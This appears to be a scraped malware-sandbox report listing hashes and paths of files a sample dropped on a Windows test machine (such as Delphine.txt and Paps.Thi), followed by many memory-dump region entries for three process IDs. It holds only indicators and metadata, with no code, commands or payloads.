5b2867c04a3987e95dbe55eb72fafbbc376aecfd6555d5870a5fbbf52f03741285596660b5e248e6527900baac5517676f96e38bedd75b974b025bd28a071573

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
2KB

MD5
0c19fc7b3617f81b65b31fff82465df5

SHA1
c831e803a7a629986beeb883fc6b7ec901c7034e

SHA256
4ec510ceb45b1fad57776243d3645c6da1c679d30286a1cc84506aa4604ba0a8

SHA512
00246bf8904fa4c78bb54d2dd3950849402bcd84d7d3ef144b3694285869ebd294106d4421a2795f5a47e5c7f3b19a1cb6373ade3e18ebd6ab7f6c6899a1dad8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
4KB

MD5
8539165e139314bfb942172791d7affa

SHA1
c4485ecd85b3d01a8f61126ed6002c58028f9d7c

SHA256
3e6ba59bb569375fcc7bc1fe7b07aef6db58877aad7884789ff3901718ef9827

SHA512
9187075272107596caa547c98c3e69e6a56db024e0586c20547d4c43de8cb48c751f5f6ab11213d8a4a3d7a609beb30027aae689a43e1bfe812cf6074b3ee5e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2297530677-1229052932-2803917579-1000\0f5007522459c86e95ffcc62f32308f1_63be8c66-23f0-4400-84bb-c1a439222555
Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2297530677-1229052932-2803917579-1000\0f5007522459c86e95ffcc62f32308f1_63be8c66-23f0-4400-84bb-c1a439222555
Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BF2ZWXMS7SFPAZZ844W0.temp
Filesize
7KB

MD5
7b54ff37410ec1a585ca40d45e7146b5

SHA1
dee904947b13d05a1d91e8bcd67118871f0d453e

SHA256
25f433a0fe4578f10566e1f56ad679b72c80055e9a1263a2437a35444c58171b

SHA512
726838858b8bea0b60998031befb960cea7166ee68a806e6a094fa762f791dab36938e5bb3b66b2eb09f9bb22510d827dbdc4cd1456634910272dad0f87b38f8

Download Submit
C:\Users\Admin\AppData\Roaming\Paps.Thi
Filesize
453KB

MD5
62a2406a56d4b84b4baad2d1c1a7479a

SHA1
2c08075d427f4ceba89260ef86e4469df1b5d398

SHA256
0239013ba33c599fcde5d5da6d6c31d9dd480871312edc0cafb840045da598e6

SHA512
01deccd705b9f4f5baa720c0646e1a09624fd7eb4db6ee716792ecf80c00c585a23a06ff0964bb09742f3716b5863c0c7160af7e1a9636feabcc2575d4c8a8ff

Download Submit
memory/1032-349-0x0000000001F10000-0x0000000001F50000-memory.dmp

Filesize
256KB

Download
memory/1032-353-0x0000000001F10000-0x0000000001F50000-memory.dmp

Filesize
256KB

Download
memory/1032-361-0x00000000066F0000-0x0000000007E5E000-memory.dmp

Filesize
23.4MB

Download
memory/1032-351-0x0000000001F10000-0x0000000001F50000-memory.dmp

Filesize
256KB

Download
memory/1032-350-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/1032-348-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/1032-371-0x00000000066F0000-0x0000000007E5E000-memory.dmp

Filesize
23.4MB

Download
memory/1032-364-0x0000000077610000-0x00000000776E6000-memory.dmp

Filesize
856KB

Download
memory/1032-365-0x0000000001F10000-0x0000000001F50000-memory.dmp

Filesize
256KB

Download
memory/1032-401-0x00000000066F0000-0x0000000007E5E000-memory.dmp

Filesize
23.4MB

Download
memory/1032-356-0x00000000066F0000-0x0000000007E5E000-memory.dmp

Filesize
23.4MB

Download
memory/1032-363-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/1032-359-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

Filesize
4KB

Download
memory/1032-362-0x0000000077420000-0x00000000775C9000-memory.dmp

Filesize
1.7MB

Download
memory/1876-355-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/1876-343-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/1876-358-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/1876-360-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/1876-354-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/1876-339-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/1876-337-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/1876-338-0x0000000002620000-0x0000000002628000-memory.dmp

Filesize
32KB

Download
memory/1876-357-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/1876-406-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/1876-341-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp

Filesize
9.6MB

Download
memory/1876-340-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/1876-342-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/2888-409-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-417-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-372-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-400-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-402-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-403-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-398-0x0000000000590000-0x0000000001CFE000-memory.dmp

Filesize
23.4MB

Download
memory/2888-397-0x0000000000590000-0x0000000001CFE000-memory.dmp

Filesize
23.4MB

Download
memory/2888-404-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-368-0x0000000077610000-0x00000000776E6000-memory.dmp

Filesize
856KB

Download
memory/2888-405-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-407-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-408-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-410-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-369-0x0000000077646000-0x0000000077647000-memory.dmp

Filesize
4KB

Download
memory/2888-411-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-412-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-414-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-416-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-399-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-418-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-420-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-419-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-415-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-413-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-367-0x0000000077420000-0x00000000775C9000-memory.dmp

Filesize
1.7MB

Download
memory/2888-366-0x0000000000590000-0x0000000001CFE000-memory.dmp

Filesize
23.4MB

Download
memory/2888-444-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-445-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-446-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-447-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-448-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-449-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-450-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-451-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-452-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-453-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-455-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-454-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2888-456-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download